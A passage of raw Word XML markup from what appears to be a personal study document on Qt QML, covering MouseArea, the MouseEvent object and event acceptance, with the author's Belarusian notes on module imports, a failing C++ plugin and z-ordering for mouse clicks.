          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"mouse left the area"</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additionally, to disable the whole mouse area, set the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2219" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="00B82406" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Толькі што, звярнуўшыся да свайго трэніровачнага праекта, я вынайшаў нарэшце, што трэба рабіць, каб креатар бачыў тыпы майго модуля. Трэба назвау модуля ў імпарце ўзяць у кавычкі.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="808000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MyModule</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="008000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:color w:val="C0C0C0"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009127BC" w:rsidRPr="00127A1B" w:rsidRDefault="009127BC" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00167600">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Але чаму</w:t>
      </w:r>
      <w:r w:rsidRPr="00127A1B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>сьці плагін С++ не хоча пампавацца.</w:t>
      </w:r>
      <w:r w:rsidR="00167600" w:rsidRPr="00127A1B">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> Потым будзем разбірацца.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00127A1B" w:rsidRPr="00B82406" w:rsidRDefault="00127A1B" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127A1B">
        <w:rPr>
          <w:i/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я знайшоў, што вар’іруючы зет каардынату, можна рэгуліраваць, што і як рэагуе на клік пацуком.</w:t>
      </w:r>
      <w:r w:rsidR="00B82406" w:rsidRPr="00B82406">
        <w:rPr>
          <w:i/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="00C50BB7" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1875" w:name="mouseevent-object"/>
      <w:bookmarkStart w:id="1876" w:name="_Toc483000936"/>
      <w:bookmarkStart w:id="1877" w:name="_Toc483003927"/>
      <w:bookmarkStart w:id="1878" w:name="_Toc483604279"/>
      <w:bookmarkStart w:id="1879" w:name="_Toc483605499"/>
      <w:bookmarkEnd w:id="1875"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MouseEvent Object</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1876"/>
      <w:bookmarkEnd w:id="1877"/>
      <w:bookmarkEnd w:id="1878"/>
      <w:bookmarkEnd w:id="1879"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Signals and their handlers receive a</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2220" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">object </w:t>
      </w:r>
      <w:r w:rsidRPr="006420FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as a parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mouse</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object contain information about the mouse event. For example, the mouse button that started the event is queried through the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2221" w:anchor="button-prop" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouse.button</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseEvent</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object can also ignore a mouse event using its</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accepted</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1880" w:name="accepting-further-signals"/>
      <w:bookmarkStart w:id="1881" w:name="_Toc483000937"/>
      <w:bookmarkStart w:id="1882" w:name="_Toc483003928"/>
      <w:bookmarkStart w:id="1883" w:name="_Toc483604280"/>
      <w:bookmarkStart w:id="1884" w:name="_Toc483605500"/>
      <w:bookmarkEnd w:id="1880"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accepting Further Signals</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1881"/>
      <w:bookmarkEnd w:id="1882"/>
      <w:bookmarkEnd w:id="1883"/>
      <w:bookmarkEnd w:id="1884"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Many of the signals are sent multiple times to reflect various mouse events such as double clicking. To facilitate the classification of mouse clicks, the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2222" w:history="1">
        <w:r w:rsidRPr="006420FB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>object has an</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006420FB">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accepted</w:t>
      </w:r>
      <w:r w:rsidRPr="006420FB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006420FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="006420FB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disable the event propagation</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="00B82406" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To learn more about QML's event system, please read the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
